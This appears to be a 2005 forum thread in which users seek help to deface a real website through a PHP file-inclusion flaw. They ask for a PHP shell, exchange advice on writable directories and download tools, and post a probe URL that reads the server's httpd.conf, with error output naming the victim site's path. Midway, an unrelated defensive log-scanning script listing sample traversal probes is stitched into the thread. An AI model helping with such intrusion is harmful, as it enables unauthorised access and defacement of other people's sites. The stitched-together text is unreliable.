IT Security and Insecurity Portal |
|
|
how to deface a site, which contains a php injection bug? |
|
Posted: Sun Oct 02, 2005 12:01 pm |
|
|
Pouya |
Regular user |
|
|
Joined: Sep 11, 2005 |
Posts: 6 |
|
|
|
|
|
|
|
howdy dudes
I found a site, which contains a php injection bug. Safemode is off, but i cannot open the /var/tmp/ or /tmp/ directory :/
I cannot upload an local exploit or a connect back and therefore i cannot execute anything. Nothing works, how can i get root and deface that page?
Here is the vuln php injection page:
http://-------/index.php?go=<and here your shell>
Can anybody help me please!!!
Thx
EDITED :NOT ADD REAL URL READ THE RULES by LINUX |
|
|
|
|
Posted: Mon Oct 03, 2005 7:41 pm |
|
|
Pouya |
Regular user |
|
|
Joined: Sep 11, 2005 |
Posts: 6 |
|
|
|
|
|
|
|
Can anybody help me please???
P.S.: I need a good php shell. If anybody knows one, please post here!!
Thx!! |
|
|
|
|
Posted: Wed Oct 05, 2005 12:55 pm |
|
|
fizzi |
Advanced user |
|
|
Joined: Sep 14, 2005 |
Posts: 55 |
|
|
|
|
|
|
|
well ......
u won't have great success to exploit that machine (as far as i see right now).
u have permission to read, but write to the current directory? u cant even open /etc/shadow or the parent directory (..).
u get something like this here:
Quote: | Warning: main(/tmp/): failed to open stream: Permission denied in /is/htdocs/57463/www.stuttgart-scorpions-jugend.de/index.php on line 95
Warning: main(/tmp/): failed to open stream: Permission denied in /is/htdocs/57463/www.stuttgart-scorpions-jugend.de/index.php on line 95
Warning: main(): Failed opening '/tmp/' for inclusion (include_path='./:/usr/share/pear/') in /is/htdocs/57463/www.stuttgart-scorpions-jugend.de/index.php on line 95 |
So hands off |
|
|
|
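Added example, not part of the thread or any poster's code: a defender-side triage script that flags requests where the `go` parameter named above is anything other than a plain page name, and pulls the attempted paths out of PHP "Failed opening ... for inclusion" warnings like the ones quoted. It covers more input kinds than the thread shows; the allowlist pattern, the host `example.test`, the documentation IP addresses and every sample log line are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed shape of a legitimate page name; adapt to the application.
SAFE_VALUE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
PHP_WARN = re.compile(r"Failed opening '([^']*)' for inclusion")

def classify(value):
    """Return a reason if the decoded value is not a plain page name."""
    if "://" in value:
        return "remote-url"
    if "\x00" in value:
        return "null-byte"
    if ".." in value:
        return "traversal"
    if value.startswith("/"):
        return "absolute-path"
    if not SAFE_VALUE.match(value):
        return "unexpected-chars"
    return None

def scan_access_log(lines, param="go"):
    """Yield (line number, reason, decoded value) for suspicious requests."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        # parse_qs percent-decodes, so encoded probes are classified too.
        for value in parse_qs(query, keep_blank_values=True).get(param, []):
            reason = classify(value)
            if reason:
                hits.append((n, reason, value))
    return hits

def scan_php_warnings(lines):
    """Paths that reached include() and failed: each is a probe to review."""
    return [m.group(1) for line in lines if (m := PHP_WARN.search(line))]

# Constructed sample data (Common Log Format and a PHP warning line).
ACCESS = [
    '203.0.113.7 - - [05/Oct/2005:12:50:01 +0000] "GET /index.php?go=news HTTP/1.1" 200 5120',
    '203.0.113.9 - - [05/Oct/2005:12:51:14 +0000] "GET /index.php?go=/tmp/ HTTP/1.1" 200 734',
    '203.0.113.9 - - [05/Oct/2005:12:51:40 +0000] "GET /index.php?go=%2Fetc%2Fhttpd%2Fconf%2Fhttpd.conf HTTP/1.1" 200 9',
    '203.0.113.9 - - [05/Oct/2005:12:52:02 +0000] "GET /index.php?go=http://example.test/x.txt HTTP/1.1" 200 734',
]
PHP_LOG = ["Warning: main(): Failed opening '/tmp/' for inclusion "
           "(include_path='./:/usr/share/pear/') in /var/www/example/index.php on line 95"]
```

A hit in the access log that also shows up in the PHP warnings means the value reached `include()` unfiltered, which is the condition to fix in the application with a fixed page-name allowlist.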
|
Posted: Wed Oct 05, 2005 1:29 pm |
|
|
fizzi |
Advanced user |
|
|
Joined: Sep 14, 2005 |
Posts: 55 |
|
|
|
|
|
|
|
|
|
|
|
|
Re: how to deface a site, which contains a php injection bug |
|
Posted: Wed Oct 05, 2005 4:48 pm |
|
|
LINUX |
Moderator |
|
|
Joined: May 24, 2004 |
Posts: 404 |
Location: Caiman |
|
|
|
|
|
|
Pouya wrote: | howdy dudes
I found a site, which contains a php injection bug. Safemode is off, but i cannot open the /var/tmp/ or /tmp/ directory :/
I cannot upload an local exploit or a connect back and therefore i cannot execute anything. Nothing works, how can i get root and deface that page?
Here is the vuln php injection page:
http://-------/index.php?go=<and here your shell>
Can anybody help me please!!!
Thx
EDITED :NOT ADD REAL URL READ THE RULES by LINUX |
first you need know kernel have this box, second you need write in one dir try search DIR (apache proxy) (/dev/shm) or other 3 need wget GET curl lynx you have this?
Remember never add REAL url here |
|
|
|
|
|
|
|
|
Posted: Sun Nov 13, 2005 12:39 pm |
|
|
Kiki |
Regular user |
|
|
Joined: Nov 13, 2005 |
Posts: 7 |
Location: Italy |
|
|
|
|
|
|
Hello, this is my first post. I'm Italian, so excuse my bad English... I wanted to know in that way I can upp one shell using http://.....index.php?go= and like using it...
Sorry for my bad English...
Kiki |
|
|
|
|
|
hello |
|
Posted: Wed Nov 30, 2005 3:12 pm |
|
|
easy_management |
Regular user |
|
|
Joined: Nov 24, 2005 |
Posts: 12 |
|
|
|
|
|
|
|
|
|
|
|
|
|
ok i captured the httpd.conf |
|
Posted: Thu Dec 01, 2005 7:35 pm |
|
|
easy_management |
Regular user |
|
|
Joined: Nov 24, 2005 |
Posts: 12 |
|
|
|
|
|
|
|
i captured httpd.conf
and i try with logs/access_log
plz don't write script php in access coz if u have error u breaking the running the code source
http://xxxxxxxxxxxxxxxxxxxxxxxxxxx/index.php?go=/etc/httpd/conf/httpd.conf